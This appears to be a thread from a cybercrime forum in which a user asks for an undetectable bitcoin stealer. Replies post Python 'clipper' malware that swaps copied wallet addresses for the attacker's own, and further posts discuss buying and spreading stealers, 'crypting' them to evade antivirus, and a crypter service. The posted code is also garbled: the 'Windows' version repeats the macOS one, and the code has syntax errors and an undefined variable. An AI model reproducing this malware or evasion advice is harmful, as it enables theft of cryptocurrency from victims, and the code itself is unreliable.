• XSS.stack #1 – первый литературный журнал от юзеров форума

Someone recommend me a good bitcoin stealer? ty too much

Пожалуйста, обратите внимание, что пользователь заблокирован
what do you need? Stealer file of cold wallet? Clipper?
Thanks for answering, I need the typical btc stealer, which makes the infected victim when copying a wallet to the clipboard, change it for my wallet
a good stealer that is not detected by antivirus, I have seen here some that have posted but I do not know if they really work.
ty too much
 

Simple python malware clipper​

One people copy the bitcoin to their clipboard address for send so this script work when the BTC address hit the clipboard when they do it was replaced the address that copied in the clipboard with the new address

Macos script

import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'

def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)

def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()

while True:
get_clipboard()
-+-+-+-+-+-+-+-+-+-+--+-++--+-+-+-++--+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
For windows

import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'

def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)

def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()

while True:
get_clipboard()


Not made by me
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Simple python malware clipper​

One people copy the bitcoin to their clipboard address for send so this script work when the BTC address hit the clipboard when they do it was replaced the address that copied in the clipboard with the new address

Macos script

import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'

def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)

def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()

while True:
get_clipboard()
-+-+-+-+-+-+-+-+-+-+--+-++--+-+-+-++--+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
For windows

import subprocess #pip install subprocess
yourBTC_address = b'YOUR BTC ADDRESS'

def get_clipboard():
p = subprocess.popen(['pbpaste']) , stdout=subprocess.PIPE)# for access the clipboard
data = str(s.stdout.read())#read data on clipboard on convert to string
if len(data) > 30: # we just suppose this bitcoin address
swap_address(data)

def swap_address(data):
p = subprocess.popen(['pbcopy']) , stdin=subprocess.PIPE)# access clipboard
p.stdin.write(yourBTC_address)
p.stdin.close()

while True:
get_clipboard()


Not made by me
ty sir
 
Пожалуйста, обратите внимание, что пользователь заблокирован
It's called clipper
The other day was that I discovered the software you sell, I have to work on a method of spreading it, and know a little better how your malware works, if you could give me some information I would appreciate it very much. I would like to buy it for you when I know how it works and spread it, thanks in advance, greetings.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I can put a good clipper to work
Well done partner, if you want to share it with me and with those who read this post feel free to do so, I would appreciate it, I am learning, greetings.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
lol , a lot of clipper are around here , a maximum cost is $50-$70 ,most of them are developed in c# , if you find something written on c , it must be helpful , to bypass AV , just crypt it
 
Пожалуйста, обратите внимание, что пользователь заблокирован
lol , a lot of clipper are around here , a maximum cost is $50-$70 ,most of them are developed in c# , if you find something written on c , it must be helpful , to bypass AV , just crypt it
I know friend, my fault for having written the thread before looking around the forum, now I have seen that there are enough things to test, thank you very much for answering sir, I am doing tests with the stormkitty, I configured a client but obviously I missing encryption, two questions:
I have seen on this forum that they recommend this page to encrypt files https://data-encoder.com/? Do you recommend it or do you know of another?
and the other is if you know any Stealer better than the Stormkitty, thank you very much for your time
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх